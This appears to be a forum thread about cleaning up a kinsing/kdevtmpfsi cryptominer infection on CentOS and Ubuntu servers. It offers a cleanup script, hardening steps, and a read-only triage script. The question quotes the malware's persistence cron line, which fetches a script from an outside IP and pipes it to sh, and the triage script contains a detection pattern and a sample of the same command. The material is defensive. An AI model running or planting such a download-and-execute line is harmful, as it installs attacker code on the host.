I've recently been hacked on my VPS (using CentOS 7.6 and CWP, up to date) and the following files/folders were created:
/tmp/.ICEd-unix
/var/tmp/.ICEd-unix
/tmp/kdevtmpfsi
/var/tmp/kinsing
The following processes were running and using 100% CPU and Memory:
kdevtmpfsi
kinsing
Also, the user's crontab had the following line:
* * * * * wget -q -O - http://195.3.146.118/p.sh | sh > /dev/null 2>&1
As of yet, I'm still getting the /tmp/.ICEd-unix and /var/tmp/.ICEd-unix folders created every hour and I can't figure out what it is.
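- create a cron job for the root user that deletes the files and kills the processes:
#!/bin/bash
# Delete the dropped files and kill the processes named in the question.
# -rf is used for .ICEd-unix because it is created as a folder, which rm -f alone cannot remove.
rm -f /var/tmp/kinsing
rm -rf /var/tmp/.ICEd-unix
killall -9 kinsing
rm -f /tmp/kdevtmpfsi
rm -rf /tmp/.ICEd-unix
killall -9 kdevtmpfsi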
- remove the crontab line from the affected user
- remove all unnecessary open ports in the firewall
- disable shell access for the user (from CWP)
- update all services/projects to the latest possible versions available in your package manager
- Found these lines in suexec.log: https://imgur.com/yIliqjJ, therefore an exploit from PHPUnit. My libraries for the Laravel project weren't up to date.
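A read-only check for the two traces described above (a crontab entry that downloads a script and pipes it to a shell, and the dropped files), as an added example that is not part of the original posts. The function names are hypothetical and the sample crontab is constructed, using the documentation address 192.0.2.10.

```bash
#!/usr/bin/env bash
# Added example: read-only triage for the persistence described in this thread.
# Function names are hypothetical; nothing here deletes or kills anything.

# Paths reported in the question, relative to a root prefix so the check can
# also be pointed at a mounted disk image or a test directory.
ARTIFACTS="tmp/.ICEd-unix var/tmp/.ICEd-unix tmp/kdevtmpfsi var/tmp/kinsing"

# Print crontab lines (read from stdin) that download with wget or curl and
# pipe the result straight into a shell. Comments and blank lines are skipped.
suspicious_cron_lines() {
  grep -vE '^[[:space:]]*(#|$)' |
    grep -E '(wget|curl)[^|]*\|[[:space:]]*(ba|da|z)?sh([[:space:]]|$)' || true
}

# Print every artifact path that exists under root prefix $1 (default "/").
found_artifacts() {
  local root="${1:-/}" p
  for p in $ARTIFACTS; do
    [ -e "${root%/}/$p" ] && echo "/$p"
  done
  return 0
}

# Scan per-user crontabs (CentOS: /var/spool/cron, Ubuntu: .../crontabs).
scan_system() {
  local f
  for f in /var/spool/cron/* /var/spool/cron/crontabs/*; do
    [ -f "$f" ] || continue
    suspicious_cron_lines < "$f" | awk -v f="$f" '{ print f ": " $0 }'
  done
  found_artifacts /
}

# Constructed sample crontab for the demo mode.
SAMPLE_CRON='# backups
0 3 * * * /usr/local/bin/backup.sh
* * * * * wget -q -O - http://192.0.2.10/p.sh | sh > /dev/null 2>&1
*/10 * * * * curl -s https://example.com/health > /dev/null'

if [ "${1:-}" = "--scan" ]; then
  scan_system   # run as root so other users' crontabs are readable
elif [ "${1:-}" = "--demo" ]; then
  printf '%s\n' "$SAMPLE_CRON" | suspicious_cron_lines
fi
```

Run it with `--scan` as root on the affected host, or with `--demo` to see which line of the sample crontab is flagged.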
Hi folks, I'm also facing the same issue on Ubuntu 18.04.5 LTS. After deleting the malware files /tmp/kinsing and /tmp/kdevtmpfsi, they are generated again automatically. To fix this issue, I created a bash script and set a cron job to run it.
My solution is following steps:
Run htop and then press F9 to kill the program. We have to kill kdevtmpfsi and kinsing as well.
Save this as one file (some-script.sh) and configure the cron job for it.
Step 1: Open crontab (the cron editor) with the following command.
$ crontab -e
Step 2: If this is your first time accessing crontab, your system will likely ask you which editor you'd prefer to use. In this example, we'll go with nano (type 1 and then Enter) since it's the easiest to understand.
Step 3: Make a new line at the bottom of this file and insert the following code. Of course, replace our example script with the command or script you wish to execute, but keep the */5 * * * * part, as that is what tells cron to execute our job every 5 minutes.
Step 4: Exit this file and save changes. To do that in nano, you'd need to press Ctrl + X, Y, and then Enter.
That's all there is to it. The job scheduled in cron will run every 5 minutes.
Hope it helps you!